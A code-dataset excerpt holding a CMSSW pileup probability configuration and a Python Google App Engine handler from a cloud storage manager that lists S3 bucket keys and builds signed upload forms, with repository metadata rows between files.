] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | SimGeneral/MixingModule/python/mix_2018_25ns_UltraLegacy_PoissonOOTPU_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | SimGeneral/MixingModule/python/mix_2018_25ns_UltraLegacy_PoissonOOTPU_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | import FWCore.ParameterSet.Config as cms
from SimGeneral.MixingModule.mix_probFunction_25ns_PoissonOOTPU_cfi import *
mix.input.nbPileupEvents.probFunctionVariable = cms.vint32(
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98
)
mix.input.nbPileupEvents.probValue = cms.vdouble(
8.89374611122e-07, 1.1777062868e-05, 3.99725585118e-05, 0.000129888015252, 0.000265224848687,
0.000313088635109, 0.000353781668514, 0.000508787237162, 0.000873670065767, 0.00147166880932,
0.00228230649018, 0.00330375581273, 0.00466047608406, 0.00624959203029, 0.00810375867901,
0.010306521821, 0.0129512453978, 0.0160303925502, 0.0192913204592, 0.0223108613632,
0.0249798930986, 0.0273973789867, 0.0294402350483, 0.031029854302, 0.0324583524255,
0.0338264469857, 0.0351267479019, 0.0360320204259, 0.0367489568401, 0.0374133183052,
0.0380352633799, 0.0386200967002, 0.039124376968, 0.0394201612616, 0.0394673457109,
0.0391705388069, 0.0384758587461, 0.0372984548399, 0.0356497876549, 0.0334655175178,
0.030823567063, 0.0278340752408, 0.0246009685048, 0.0212676009273, 0.0180250593982,
0.0149129830776, 0.0120582333486, 0.00953400069415, 0.00738546929512, 0.00563442079939,
0.00422052915668, 0.00312446316347, 0.00228717533955, 0.00164064894334, 0.00118425084792,
0.000847785826565, 0.000603466454784, 0.000419347268964, 0.000291768785963, 0.000199761337863,
0.000136624574661, 9.46855200945e-05, 6.80243180179e-05, 4.94806013765e-05, 3.53122628249e-05,
2.556765786e-05, 1.75845711623e-05, 1.23828210848e-05, 9.31669724108e-06, 6.0713272037e-06,
3.95387384933e-06, 2.02760874107e-06, 1.22535149516e-06, 9.79612472109e-07, 7.61730246474e-07,
4.2748847738e-07, 2.41170461205e-07, 1.38701083552e-07, 3.37678010922e-08, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0
)
| 57.948718 | 98 | 0.699558 |
ace94da561e189b566a66d7241b409dcb2ff14f9 | 31,436 | py | Python | s3/S3.py | christianbaun/octopuscloud | 92e6da659eb645f0e782f1565f2063ab2370a742 | [
"Apache-2.0"
] | 2 | 2018-11-13T01:36:23.000Z | 2019-09-29T06:24:03.000Z | s3/S3.py | christianbaun/octopuscloud | 92e6da659eb645f0e782f1565f2063ab2370a742 | [
"Apache-2.0"
] | null | null | null | s3/S3.py | christianbaun/octopuscloud | 92e6da659eb645f0e782f1565f2063ab2370a742 | [
"Apache-2.0"
] | 1 | 2020-07-25T20:01:52.000Z | 2020-07-25T20:01:52.000Z | #!/usr/bin/env python
import os
import re
import hmac, sha
# this is needed for the encyption
import base64
# Configuration file
from google.appengine.api import users
from google.appengine.ext import webapp
from google.appengine.ext import db
from google.appengine.ext.webapp import template
from google.appengine.api.urlfetch import DownloadError
from library import aktuelle_sprache
from library import navigations_bar_funktion
from library import format_error_message_green
from library import format_error_message_red
from library import logins3
from library import aws_access_key_erhalten
from library import aws_secret_access_key_erhalten
from library import endpointurl_erhalten
from library import port_erhalten
from library import get_second_list
from dateutil.parser import *
from error_messages import error_messages
# this is needed for the encyption
from itertools import izip, cycle
from ConfigParser import SafeConfigParser
# Read the application configuration file once at import time.
parser = SafeConfigParser()
parser.read('simple.cfg')
class S3(webapp.RequestHandler):
    """Request handler for the /S3 page of the OctopusCloud application.

    Renders an overview of the keys stored in the logged-in user's bucket
    at the configured storage service(s) (Amazon S3, Google Storage or a
    Walrus/Eucalyptus private cloud), together with upload/delete forms and
    redundancy/synchronicity status messages.
    """
    def get(self):
        """Build and write the HTML page listing the user's bucket keys.

        Reads the user's stored credentials from the datastore, connects to
        the matching storage service, lists the bucket's keys and assembles
        the HTML fragments handed to the ``s3.html`` template.
        """
        # self.response.out.write('posted!')
        # Get username
        username = users.get_current_user()
        if not username:
            self.redirect('/')
        # Get error messages if any exist
        message = self.request.get('message')
        # Datastore query that checks if any credentials for this user exist
        testen = db.GqlQuery("SELECT * FROM OctopusCloudDatenbank WHERE user = :username_db", username_db=username)
        # How many entries of this user exist?
        anzahl = testen.count()
        # Get the result of your datastore query
        results = testen.fetch(100)
        if not results:
            self.redirect('/')
        else:
            # Datastore query that checks if credentials for Amazon S3 exist
            testen = db.GqlQuery("SELECT * FROM OctopusCloudDatenbank WHERE user = :username_db AND zugangstyp = :zugangstyp_db", username_db=username, zugangstyp_db="Amazon")
            # Get the result of your datastore query
            results = testen.fetch(100)
            if results:
                # If credentials for Amazon S3 exist
                aktuellezone = "Amazon"
                eucalyptusname = "Amazon"
            else:
                # No credentials for Amazon S3 exist
                # Datastore query that checks if credentials for a Walrus (Eucalyptus) Private Cloud exist
                testen = db.GqlQuery("SELECT * FROM OctopusCloudDatenbank WHERE user = :username_db AND zugangstyp = :zugangstyp_db", username_db=username, zugangstyp_db="Eucalyptus")
                # Get the result of your datastore query
                results = testen.fetch(100)
                if results:
                    # If credentials for an Walrus (Eucalyptus) Private Cloud exist
                    aktuellezone = "Eucalyptus"
                    # Get the credentials for the Walrus (Eucalyptus) Private Cloud
                    anzahl = testen.count()
                    # NOTE(review): only the last row's name survives this loop
                    for test in results:
                        eucalyptusname = str(test.eucalyptusname)
                else:
                    # If no Walrus (Eucalyptus) credentials are given, we jump back to the root window
                    self.redirect('/')
            # Get the language of the user
            sprache = aktuelle_sprache(username)
            # Generate the navigations bar
            navigations_bar = navigations_bar_funktion(sprache)
            # NOTE(review): the first replace() is a no-op as written — looks
            # like '&amp;' unescaping was intended; confirm against VCS.
            url = users.create_logout_url(self.request.uri).replace('&', '&').replace('&amp;', '&')
            url_linktext = 'Logout'
            # If the language is not set to german, it is set here to english
            if sprache != "de":
                sprache = "en"
            input_error_message = error_messages.get(message, {}).get(sprache)
            # If no error messages exist, the result here is "None".
            if input_error_message == None:
                input_error_message = ""
            # These error messages are formated in green...
            if message in ("111", "118", "120"):
                # This helper function formats in green
                input_error_message = format_error_message_green(input_error_message)
            # These error messages are formated in red...
            elif message in ("112", "119", "121"):
                input_error_message = format_error_message_red(input_error_message)
            else:
                input_error_message = ""
            # Get Access Kkey for storage service that is used to display the list of keys
            AWSAccessKeyId = aws_access_key_erhalten(username,eucalyptusname)
            # Get Secret Access Key for storage service that is used to display the list of keys
            AWSSecretAccessKeyId = aws_secret_access_key_erhalten(username,eucalyptusname)
            # Connect with storage service
            conn_s3, regionname = logins3(username, aktuellezone)
            # Get values from the config file
            # The name of the bucket that is used
            # The character "@" cannot be used. Therefore we use "at".
            bucketname = str(parser.get('bucket', 'bucketname'))+str(username).replace('@', 'at').replace('.', '-')
            # NOTE(review): the bare excepts below swallow every exception,
            # including programming errors — consider narrowing them.
            try:
                # Connect with bucket
                bucket_instance = conn_s3.get_bucket(bucketname)
            except:
                # When it didn't work
                if sprache == "de":
                    bucket_keys_tabelle = '<font color="red">Es ist zu einem Fehler gekommen</font>'
                else:
                    bucket_keys_tabelle = '<font color="red">An error occured</font>'
                laenge_liste_keys = 0
            else:
                # When it worked...
                try:
                    # Get a list of all keys inside the bucket
                    liste_keys = bucket_instance.get_all_keys()
                except:
                    # When it didn't work
                    if sprache == "de":
                        bucket_keys_tabelle = '<font color="red">Es ist zu einem Fehler gekommen</font>'
                    else:
                        bucket_keys_tabelle = '<font color="red">An error occured</font>'
                    laenge_liste_keys = 0
                else:
                    # When it worked...
                    # Number of keys inside the list
                    laenge_liste_keys = len(liste_keys)
                    # When using Walrus (Eucalyptus), we need to erase the stupid "None" entry.
                    # if aktuellezone != "Amazon":
                    # liste_keys2 = []
                    # for i in range(laenge_liste_keys):
                    # if str(liste_keys[i].name) != 'None':
                    # liste_keys2.append(liste_keys[i])
                    # laenge_liste_keys2 = len(liste_keys2)
                    # laenge_liste_keys = laenge_liste_keys2
                    # liste_keys = liste_keys2
                    # If we have more than one storage services, we need to compare the MD5 checksums
                    # NOTE(review): Main_Liste/Second_list are only defined on
                    # this success path; if either try above failed while
                    # anzahl > 1, the synchronicity check further down raises
                    # a NameError — confirm and guard if needed.
                    if anzahl > 1:
                        # If we have keys inside the bucket, we need to create a list that contains the MD5 checksums
                        if laenge_liste_keys == 0:
                            # Create an empty List
                            Main_Liste = []
                            # Length of the List
                            Main_Liste_laenge = len(Main_Liste)
                            Second_list = get_second_list(username, aktuellezone, eucalyptusname)
                            Second_list_laenge = len(Second_list)
                        else:
                            # if laenge_liste_keys is not 0
                            # Create an empty List
                            Main_Liste = []
                            # Walk through the list of keys
                            for i in range(laenge_liste_keys):
                                # In S3 each MD5 checksum is enclosed by double quotes. In Walrus they are not
                                Main_Liste.append(str(liste_keys[i].etag).replace('"',''))
                            # Sort the List
                            Main_Liste.sort()
                            # Length of the List
                            Main_Liste_laenge = len(Main_Liste)
                            Second_list = get_second_list(username, aktuellezone, eucalyptusname)
                            Second_list_laenge = len(Second_list)
                            # self.response.out.write(Main_Liste)
                            # self.response.out.write(Main_Liste_laenge)
                            # self.response.out.write(Second_list)
                            # self.response.out.write(Second_list_laenge)
                    if laenge_liste_keys == 0:
                        # No keys have been imported yet!
                        if sprache == "de":
                            bucket_keys_tabelle = 'Sie haben noch keine Dateien importiert.'
                        else:
                            bucket_keys_tabelle = 'No keys have been imported yet.'
                    else:
                        # There are keys in the bucket
                        bucket_keys_tabelle = ''
                        bucket_keys_tabelle = bucket_keys_tabelle + '<table border="3" cellspacing="0" cellpadding="5">'
                        bucket_keys_tabelle = bucket_keys_tabelle + '<tr>'
                        bucket_keys_tabelle = bucket_keys_tabelle + '<th> </th>'
                        bucket_keys_tabelle = bucket_keys_tabelle + '<th> </th>'
                        if sprache == "de":
                            bucket_keys_tabelle = bucket_keys_tabelle + '<th align="left">Keys</th>'
                            bucket_keys_tabelle = bucket_keys_tabelle + '<th align="center">Dateigröße</th>'
                            bucket_keys_tabelle = bucket_keys_tabelle + '<th align="center">Letzte Änderung</th>'
                            bucket_keys_tabelle = bucket_keys_tabelle + '<th align="center">Zugriffsberechtigung</th>'
                            bucket_keys_tabelle = bucket_keys_tabelle + '<th align="center">Prüfsumme (MD5)</th>'
                        else:
                            bucket_keys_tabelle = bucket_keys_tabelle + '<th align="left">Keys</th>'
                            bucket_keys_tabelle = bucket_keys_tabelle + '<th align="center">Filesize</th>'
                            bucket_keys_tabelle = bucket_keys_tabelle + '<th align="center">Last Modified</th>'
                            bucket_keys_tabelle = bucket_keys_tabelle + '<th align="center">Access Control List</th>'
                            bucket_keys_tabelle = bucket_keys_tabelle + '<th align="center">MD5</th>'
                        bucket_keys_tabelle = bucket_keys_tabelle + '</tr>'
                        # One table row per key: delete link, icon, download
                        # link, size, mtime, ACL link and MD5 checksum.
                        for i in range(laenge_liste_keys):
                            bucket_keys_tabelle = bucket_keys_tabelle + '<tr>'
                            if liste_keys[i].name == None and aktuellezone != "Amazon":
                                bucket_keys_tabelle = bucket_keys_tabelle + '<td> </td>'
                            else:
                                bucket_keys_tabelle = bucket_keys_tabelle + '<td>'
                                bucket_keys_tabelle = bucket_keys_tabelle + '<a href="/bucketkeyentfernen?md5hash='
                                bucket_keys_tabelle = bucket_keys_tabelle + str(liste_keys[i].etag).replace('"','')
                                if sprache == "de":
                                    bucket_keys_tabelle = bucket_keys_tabelle + '" title="Key löschen"><img src="bilder/delete.png" width="16" height="16" border="0" alt="Key löschen"></a>'
                                else:
                                    bucket_keys_tabelle = bucket_keys_tabelle + '" title="erase key"><img src="bilder/delete.png" width="16" height="16" border="0" alt="erase key"></a>'
                                bucket_keys_tabelle = bucket_keys_tabelle + '</td>'
                            if liste_keys[i].name == None and aktuellezone != "Amazon":
                                bucket_keys_tabelle = bucket_keys_tabelle + '<td> </td>'
                            else:
                                bucket_keys_tabelle = bucket_keys_tabelle + '<td>'
                                if sprache == "de":
                                    bucket_keys_tabelle = bucket_keys_tabelle + '<img src="bilder/document.png" width="16" height="16" border="0" alt="Datei">'
                                else:
                                    bucket_keys_tabelle = bucket_keys_tabelle + '<img src="bilder/document.png" width="16" height="16" border="0" alt="File">'
                                bucket_keys_tabelle = bucket_keys_tabelle + '</td>'
                            bucket_keys_tabelle = bucket_keys_tabelle + '<td>'
                            bucket_keys_tabelle = bucket_keys_tabelle + '<a href="'
                            # Pre-signed download URL, valid for 600 seconds.
                            bucket_keys_tabelle = bucket_keys_tabelle + liste_keys[i].generate_url(600, method='GET', headers=None, query_auth=True, force_http=False).replace('&', '&').replace('&amp;', '&')
                            bucket_keys_tabelle = bucket_keys_tabelle + '">'
                            bucket_keys_tabelle = bucket_keys_tabelle + str(liste_keys[i].name)
                            bucket_keys_tabelle = bucket_keys_tabelle + '</a>'
                            bucket_keys_tabelle = bucket_keys_tabelle + '</td>'
                            bucket_keys_tabelle = bucket_keys_tabelle + '<td align="right">'
                            if liste_keys[i].name == None and aktuellezone != "Amazon":
                                bucket_keys_tabelle = bucket_keys_tabelle + ' '
                            else:
                                bucket_keys_tabelle = bucket_keys_tabelle + str(liste_keys[i].size)
                            bucket_keys_tabelle = bucket_keys_tabelle + '</td>'
                            bucket_keys_tabelle = bucket_keys_tabelle + '<td>'
                            # Format ISO8601 timestring for better looking.
                            if liste_keys[i].name == None and aktuellezone != "Amazon":
                                bucket_keys_tabelle = bucket_keys_tabelle + ' '
                            else:
                                datum_der_letzten_aenderung = parse(liste_keys[i].last_modified)
                                bucket_keys_tabelle = bucket_keys_tabelle + str(datum_der_letzten_aenderung.strftime("%Y-%m-%d %H:%M:%S"))
                            bucket_keys_tabelle = bucket_keys_tabelle + '</td>'
                            bucket_keys_tabelle = bucket_keys_tabelle + '<td align="center">'
                            bucket_keys_tabelle = bucket_keys_tabelle + '<a href="/acl_einsehen?key='
                            bucket_keys_tabelle = bucket_keys_tabelle + str(liste_keys[i].name)
                            bucket_keys_tabelle = bucket_keys_tabelle + '&md5hash='
                            bucket_keys_tabelle = bucket_keys_tabelle + str(liste_keys[i].etag).replace('"','')
                            if sprache == "de":
                                bucket_keys_tabelle = bucket_keys_tabelle + '" title="ACL einsehen/ändern">ACL einsehen/ändern</a>'
                            else:
                                bucket_keys_tabelle = bucket_keys_tabelle + '" title="view/edit ACL">view/edit ACL</a>'
                            bucket_keys_tabelle = bucket_keys_tabelle + '</td>'
                            bucket_keys_tabelle = bucket_keys_tabelle + '<td align="center">'
                            bucket_keys_tabelle = bucket_keys_tabelle + '<tt>'+str(liste_keys[i].etag).replace('"','')+'</tt>'
                            bucket_keys_tabelle = bucket_keys_tabelle + '</td>'
                            bucket_keys_tabelle = bucket_keys_tabelle + '</tr>'
                        bucket_keys_tabelle = bucket_keys_tabelle + '</table>'
            #Documentation about howto upload keys into S3
            #http://docs.amazonwebservices.com/AmazonS3/latest/index.html?HTTPPOSTForms.html
            #http://doc.s3.amazonaws.com/proposals/post.html
            #http://developer.amazonwebservices.com/connect/entry.jspa?externalID=1434
            #http://s3.amazonaws.com/doc/s3-example-code/post/post_sample.html
            # Create the policy dokument
            # expiration date is specified in ISO 8601 format.
            policy_document = ''
            policy_document = policy_document + '{'
            policy_document = policy_document + '"expiration": "2100-01-01T00:00:00Z",'
            policy_document = policy_document + '"conditions": ['
            policy_document = policy_document + '{"bucket": "'+bucketname+'"}, '
            policy_document = policy_document + '["starts-with", "$acl", ""],'
            policy_document = policy_document + '{"success_action_redirect": "http://cloudoctopus.appspot.com/S3"},'
            policy_document = policy_document + '["starts-with", "$key", ""],'
            policy_document = policy_document + '["starts-with", "$Content-Type", ""]'
            policy_document = policy_document + ']'
            policy_document = policy_document + '}'
            # Encode the policy document using Base64
            policy = base64.b64encode(policy_document)
            # Calculate the signature with the Secret Access Key and the policy
            signature = base64.b64encode(hmac.new(AWSSecretAccessKeyId, policy, sha).digest())
            # This is done all before.
            # !!! Silly programming !!!
            # Get data out of the DB
            alledaten = db.GqlQuery("SELECT * FROM OctopusCloudDatenbank WHERE user = :username_db", username_db=username)
            # How many entries for this user exist?
            # NOTE(review): "clount" looks like a typo for "count"; the
            # variable is never read afterwards.
            alledaten_clount = alledaten.count()
            # Get all data of user
            alledaten_ergebnisse = alledaten.fetch(100)
            i = 0
            # Walk through every line of the user in the DB
            # Collect credentials/signatures for (at most) the first two
            # configured storage services.
            for alledatendurchlauf in alledaten_ergebnisse:
                i = i + 1
                if i == 1:
                    regionname1 = str(alledatendurchlauf.regionname)
                    endpointurl1 = str(alledatendurchlauf.endpointurl)
                    accesskey1 = str(alledatendurchlauf.accesskey)
                    zugangstyp1 = str(alledatendurchlauf.zugangstyp)
                    eucalyptusname1 = str(alledatendurchlauf.eucalyptusname)
                    port1 = str(alledatendurchlauf.port)
                    ziel_adresse_upload1 = endpointurl1 + '/'
                    AWSSecretAccessKeyId1 = aws_secret_access_key_erhalten(username,eucalyptusname1)
                    signature1 = base64.b64encode(hmac.new(AWSSecretAccessKeyId1, policy, sha).digest())
                else:
                    regionname2 = str(alledatendurchlauf.regionname)
                    endpointurl2 = str(alledatendurchlauf.endpointurl)
                    accesskey2 = str(alledatendurchlauf.accesskey)
                    zugangstyp2 = str(alledatendurchlauf.zugangstyp)
                    eucalyptusname2 = str(alledatendurchlauf.eucalyptusname)
                    port2 = str(alledatendurchlauf.port)
                    ziel_adresse_upload2 = endpointurl2 + '/'
                    AWSSecretAccessKeyId2 = aws_secret_access_key_erhalten(username,eucalyptusname2)
                    signature2 = base64.b64encode(hmac.new(AWSSecretAccessKeyId2, policy, sha).digest())
            # self.response.out.write(regionname1 + '<BR>')
            # self.response.out.write(zugangstyp1 + '<BR>')
            # self.response.out.write(eucalyptusname1 + '<BR>')
            # self.response.out.write(accesskey1 + '<BR>')
            # self.response.out.write(AWSSecretAccessKeyId1 + '<BR>')
            # self.response.out.write(ziel_adresse_upload1+bucketname + '<BR>')
            #
            # self.response.out.write(regionname2 + '<BR>')
            # self.response.out.write(zugangstyp2 + '<BR>')
            # self.response.out.write(eucalyptusname2 + '<BR>')
            # self.response.out.write(accesskey2 + '<BR>')
            # self.response.out.write(AWSSecretAccessKeyId2 + '<BR>')
            # self.response.out.write(ziel_adresse_upload2+bucketname + '<BR>')
            # JavaScript "data" array with one upload target per storage
            # service, consumed by upload.js.
            ajax_formular = ''
            ajax_formular = ajax_formular + '<script type="text/javascript" src="jquery.min.js"></script>\n'
            ajax_formular = ajax_formular + '<script type="text/javascript" src="upload.js"></script>\n'
            ajax_formular = ajax_formular + '<script type="text/javascript" src="jquery.blockUI.js"></script>\n'
            ajax_formular = ajax_formular + '<script type="text/javascript">'
            if anzahl == 1:
                # if aktuellezone == "Eucalyptus":
                # endpointurl = endpointurl_erhalten(username,eucalyptusname)
                # port = port_erhalten(username,eucalyptusname)
                # ziel_adresse = str(endpointurl) + ':' + str(port) + '/services/Walrus/'
                if aktuellezone == "GoogleStorage":
                    ziel_adresse = 'commondatastorage.googleapis.com/'
                else:
                    # aktuellezone == "Amazon":
                    ziel_adresse = 's3.amazonaws.com/'
                ajax_formular = ajax_formular + 'var data = ['
                ajax_formular = ajax_formular + '{sUrl:"http://'+ziel_adresse+bucketname+'",'
                ajax_formular = ajax_formular + ' success_action_redirect:"http://cloudoctopus.appspot.com/S3",'
                ajax_formular = ajax_formular + ' AWSAccessKeyId:"'+AWSAccessKeyId+'",'
                ajax_formular = ajax_formular + ' policy:"'+policy+'",'
                ajax_formular = ajax_formular + ' signature:"'+signature+'"}'
                ajax_formular = ajax_formular + '];'
            else:
                ajax_formular = ajax_formular + 'var data = ['
                ajax_formular = ajax_formular + '{sUrl:"http://'+ziel_adresse_upload1+bucketname+'",'
                ajax_formular = ajax_formular + ' success_action_redirect:"http://cloudoctopus.appspot.com/S3",'
                ajax_formular = ajax_formular + ' AWSAccessKeyId:"'+accesskey1+'",'
                ajax_formular = ajax_formular + ' policy:"'+policy+'",'
                ajax_formular = ajax_formular + ' signature:"'+signature1+'"}'
                ajax_formular = ajax_formular + ' ,'
                ajax_formular = ajax_formular + ' {sUrl:"http://'+ziel_adresse_upload2+bucketname+'",'
                ajax_formular = ajax_formular + ' success_action_redirect:"http://cloudoctopus.appspot.com/S3",'
                ajax_formular = ajax_formular + ' AWSAccessKeyId:"'+accesskey2+'",'
                ajax_formular = ajax_formular + ' policy:"'+policy+'",'
                ajax_formular = ajax_formular + ' signature:"'+signature2+'"}'
                ajax_formular = ajax_formular + '];'
            ajax_formular = ajax_formular + '</script>\n'
            # Browser-based POST upload form (ACL + Content-Type selectors,
            # hidden policy/signature fields filled in by upload.js).
            keys_upload_formular = '<p> </p>\n'
            keys_upload_formular = keys_upload_formular + '<form target="frame1" id="form1" action="" method="post" enctype="multipart/form-data">\n'
            keys_upload_formular = keys_upload_formular + '<table border="0" cellspacing="0" cellpadding="5">'
            keys_upload_formular = keys_upload_formular + '<tr>'
            keys_upload_formular = keys_upload_formular + '<td>'
            keys_upload_formular = keys_upload_formular + '<input type="hidden" name="key" value="$(unknown)">\n'
            keys_upload_formular = keys_upload_formular + '<select name="acl" size="1">\n'
            keys_upload_formular = keys_upload_formular + '<option selected="selected">public-read</option>\n'
            keys_upload_formular = keys_upload_formular + '<option>private</option>\n'
            keys_upload_formular = keys_upload_formular + '<option>public-read-write</option>\n'
            keys_upload_formular = keys_upload_formular + '<option>authenticated-read</option>\n'
            keys_upload_formular = keys_upload_formular + '</select>\n'
            keys_upload_formular = keys_upload_formular + '<select name="Content-Type" size="1">\n'
            keys_upload_formular = keys_upload_formular + '<option selected="selected">application/octet-stream</option>\n'
            keys_upload_formular = keys_upload_formular + '<option>application/pdf</option>\n'
            keys_upload_formular = keys_upload_formular + '<option>application/zip</option>\n'
            keys_upload_formular = keys_upload_formular + '<option>audio/mp4</option>\n'
            keys_upload_formular = keys_upload_formular + '<option>audio/mpeg</option>\n'
            keys_upload_formular = keys_upload_formular + '<option>audio/ogg</option>\n'
            keys_upload_formular = keys_upload_formular + '<option>audio/vorbis</option>\n'
            keys_upload_formular = keys_upload_formular + '<option>image/gif</option>\n'
            keys_upload_formular = keys_upload_formular + '<option>image/jpeg</option>\n'
            keys_upload_formular = keys_upload_formular + '<option>image/png</option>\n'
            keys_upload_formular = keys_upload_formular + '<option>image/tiff</option>\n'
            keys_upload_formular = keys_upload_formular + '<option>text/html</option>\n'
            keys_upload_formular = keys_upload_formular + '<option>text/plain</option>\n'
            keys_upload_formular = keys_upload_formular + '<option>video/mp4</option>\n'
            keys_upload_formular = keys_upload_formular + '<option>video/mpeg</option>\n'
            keys_upload_formular = keys_upload_formular + '<option>video/ogg</option>\n'
            keys_upload_formular = keys_upload_formular + '</select>\n'
            keys_upload_formular = keys_upload_formular + '</td>\n'
            keys_upload_formular = keys_upload_formular + '</tr>\n'
            keys_upload_formular = keys_upload_formular + '<tr>\n'
            keys_upload_formular = keys_upload_formular + '<td>\n'
            keys_upload_formular = keys_upload_formular + '<input type="hidden" id="success_action_redirect" name="success_action_redirect" value="">\n'
            keys_upload_formular = keys_upload_formular + '<input type="hidden" id="AWSAccessKeyId" name="AWSAccessKeyId" value="">\n'
            keys_upload_formular = keys_upload_formular + '<input type="hidden" id="policy" name="policy" value="">\n'
            keys_upload_formular = keys_upload_formular + '<input type="hidden" id="signature" name="signature" value="">\n'
            #keys_upload_formular = keys_upload_formular + '<input type="hidden" id="submit" name="submit" value="submit">\n'
            keys_upload_formular = keys_upload_formular + '</td>\n'
            keys_upload_formular = keys_upload_formular + '</tr>\n'
            keys_upload_formular = keys_upload_formular + '<tr>\n'
            keys_upload_formular = keys_upload_formular + '<td>\n'
            keys_upload_formular = keys_upload_formular + '<input type="file" name="file" size="80">\n'
            keys_upload_formular = keys_upload_formular + '</td>\n'
            keys_upload_formular = keys_upload_formular + '</tr>\n'
            # Traditional Way to upload a Key into S3
            keys_upload_formular = keys_upload_formular + '<tr>'
            keys_upload_formular = keys_upload_formular + '<td>'
            if sprache == "de":
                keys_upload_formular = keys_upload_formular + '<input type="submit" style="display:none" id="button2" name="submit" value="Datei hochladen">\n'
            else:
                keys_upload_formular = keys_upload_formular + '<input type="submit" style="display:none" id="button2" name="submit" value="upload file">\n'
            keys_upload_formular = keys_upload_formular + '</td>'
            keys_upload_formular = keys_upload_formular + '</tr>'
            keys_upload_formular = keys_upload_formular + '</table>\n'
            keys_upload_formular = keys_upload_formular + '</form>'
            keys_upload_formular = keys_upload_formular + '\n'
            keys_upload_formular = keys_upload_formular + '<div id="statustext"></div>'
            keys_upload_formular = keys_upload_formular + '<div style="border:1px solid black;width:200px;height:20px"><div id="statusbar" style="background-color:black;width:1px;height:20px"> </div></div>'
            if sprache == "de":
                keys_upload_formular = keys_upload_formular + '<button id="button1">Datei hochladen</button>'
            else:
                keys_upload_formular = keys_upload_formular + '<button id="button1">upload file</button>'
            iframe = '<iframe id="frame1" name="frame1" style="display:none"></iframe>'
            # "Erase all keys" button is only shown when keys exist.
            if laenge_liste_keys != 0:
                alle_keys_loeschen_button = '<p> </p>\n'
                alle_keys_loeschen_button = alle_keys_loeschen_button + '<form action="/alle_keys_loeschen" method="get">\n'
                alle_keys_loeschen_button = alle_keys_loeschen_button + '<input type="hidden" name="s3_ansicht" value="pur"> \n'
                alle_keys_loeschen_button = alle_keys_loeschen_button + '<input type="hidden" name="bucket_name" value="'+bucketname+'"> \n'
                if sprache == "de":
                    alle_keys_loeschen_button = alle_keys_loeschen_button + '<input type="submit" value="Alle Keys löschen">\n'
                else:
                    alle_keys_loeschen_button = alle_keys_loeschen_button + '<input type="submit" value="Erase all keys">\n'
                alle_keys_loeschen_button = alle_keys_loeschen_button + '</form>\n'
            else:
                alle_keys_loeschen_button = ''
            if anzahl == 1:
                if sprache == "de":
                    redundanz_warnung = 'Sie nutzen aktuell nur einen Cloud-basierten Speicher-Dienst. '
                    redundanz_warnung = redundanz_warnung + 'Somit ist keine Redundanz möglich!'
                    redundanz_warnung = redundanz_warnung + '<p> </p>'
                else:
                    redundanz_warnung = 'You use just a single cloud-based storage service. '
                    redundanz_warnung = redundanz_warnung + 'Therefore, the data is not stored in a redundant way!'
                    redundanz_warnung = redundanz_warnung + '<p> </p>'
            # NOTE(review): because anzahl == 1 is handled above, this branch
            # is effectively "anzahl > 1"; the else only fires for anzahl == 0.
            elif anzahl >= 1:
                if sprache == "de":
                    redundanz_warnung = 'Sie nutzen aktuell ' + str(anzahl) + ' Cloud-basierte Speicher-Dienste. '
                    redundanz_warnung = redundanz_warnung + 'Somit ist Redundanz möglich!'
                    redundanz_warnung = redundanz_warnung + '<p> </p>'
                else:
                    redundanz_warnung = 'You use ' + str(anzahl) + ' cloud-based storage services. '
                    redundanz_warnung = redundanz_warnung + 'Therefore, the data can be stored in a redundant way!'
                    redundanz_warnung = redundanz_warnung + '<p> </p>'
            else:
                redundanz_warnung = ''
            if anzahl == 1:
                # If the number of storage services is 1, the data is always syncron
                synchron_warnung = ''
            else:
                # If there are more than one storage service, check if data is synchron
                # Check here for synchronicity
                if Main_Liste == Second_list:
                    # If both Lists are equal
                    if sprache == "de":
                        synchron_warnung = '<font color="green">Ihre Daten sind synchron</font>'
                        synchron_warnung = synchron_warnung + '<p> </p>'
                    else:
                        synchron_warnung = '<font color="green">Your data are synchron</font>'
                        synchron_warnung = synchron_warnung + '<p> </p>'
                else:
                    # If both Lists are not equal
                    if sprache == "de":
                        synchron_warnung = '<font color="red">Ihre Daten sind nicht synchron!</font>'
                        synchron_warnung = synchron_warnung + '<p> </p>'
                    else:
                        synchron_warnung = '<font color="red">The synchronicity of your data is broken!</font>'
                        synchron_warnung = synchron_warnung + '<p> </p>'
            # Hand all assembled HTML fragments to the template.
            template_values = {
                'navigations_bar': navigations_bar,
                'url': url,
                'url_linktext': url_linktext,
                'bucket_keys_tabelle': bucket_keys_tabelle,
                'input_error_message': input_error_message,
                'keys_upload_formular': keys_upload_formular,
                'alle_keys_loeschen_button': alle_keys_loeschen_button,
                'redundanz_warnung': redundanz_warnung,
                'ajax_formular': ajax_formular,
                'iframe': iframe,
                'synchron_warnung': synchron_warnung
                }
            path = os.path.join(os.path.dirname(__file__), "../templates", sprache, "s3.html")
            self.response.out.write(template.render(path,template_values))
| 53.553663 | 209 | 0.614264 |
ace94dba524331e60de9e97e92ca0013c537f5f6 | 8,955 | py | Python | rational/numpy/rationals.py | ThomasRot/rational_activations | 1fa26d1ee5f3c916eda00c899afa96eccb960143 | [
"MIT"
] | null | null | null | rational/numpy/rationals.py | ThomasRot/rational_activations | 1fa26d1ee5f3c916eda00c899afa96eccb960143 | [
"MIT"
